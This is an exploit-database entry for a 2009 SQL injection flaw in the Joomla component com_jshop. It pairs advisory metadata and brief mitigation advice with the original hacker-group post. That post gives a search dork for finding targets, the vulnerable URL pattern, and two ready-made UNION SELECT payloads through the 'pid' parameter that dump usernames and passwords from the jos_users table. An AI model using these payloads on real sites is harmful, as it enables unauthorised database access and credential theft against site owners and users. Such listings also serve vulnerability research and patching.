Joomla Component com_jshop SQL Injection Vulnerability

vendor:

com_jshop

by:

Don Tukulesto

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: com_jshop

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Joomla Component com_jshop SQL Injection Vulnerability

A SQL injection vulnerability exists in Joomla Component com_jshop, which allows an attacker to execute arbitrary SQL commands via the 'pid' parameter in a 'index.php' request. An attacker can exploit this vulnerability to gain access to sensitive information in the back-end database, such as usernames and passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should use parameterized queries to prevent SQL injection.

Source

Exploit-DB raw data:

/**************************************************************************

[~] Joomla Component com_jshop SQL Injection Vulnerability
[~] Author	: Don Tukulesto (root@indonesiancoder.com)
[~] Homepage	: http://www.indonesiancoder.com
[~] Date	: October 23, 2009
[~] Tune In	: http://antisecradio.fm (choose your weapon)

**************************************************************************/

[+] Dork : inurl:"kaMtiEz"+"tukulesto"
[+] Price : FREE (Open Source Content Management)

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_jshop&view=product&family=INDONESIANCODER&group=0&pid=[ExpL0!7]

[ ExpL0!7 ]

-12+union+select+6,6,@@version,concat(0x3a,username,password),6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6+from+jos_users--

-12/**/UNION/**/SELECT/**/6,username,concat(0x3a,username,password),@@version,6,6,6,6,6,6,6,6,6,6,6,6,6,password,6,6/**/from/**/jos_users/*

===========================================================================

[ Gracias ]

[+] In the Name of ALLAH, Most Gracious, Most Merciful.
[+] INDONESIAN CODER TEAM - KILL-9 CREW - Anti Security - MainHack Brotherhood - ServerIsDown
[+] kaMtiEz, M3NW5, arianom, tiw0L, Pathloader, abah_benu, VycOd, Jack-, Yadoy666
[+] Contrex, alsastrow, TUCKER, IAN PETRUCII, Cyb3r_tr0n, M364TR0N, Gonzhack, SAINT, Ronz
[+] XNITRO, DraCoola Multimedia, AWAN Bejat, Plaque, rey_cute, Gh4mb4s, noname, SurabayaHackerLink
[+] #nusantarahacker, #becak, #indonesiancoder, #kill-9, #becak, and YOU!!

[ NOTE ] 

[!] The following procedures (methods) may contain something offensive
[!] Only for security researches and teaching , at your own risk!

[ QUOTE ]

[+] Mom and Father and my sister i love u
[+] Mencari si Anak Hilang ...
[+] Kapan saya nikan sama Sanny Aura Syahrani? Ya ALLAH, tolonglah daku !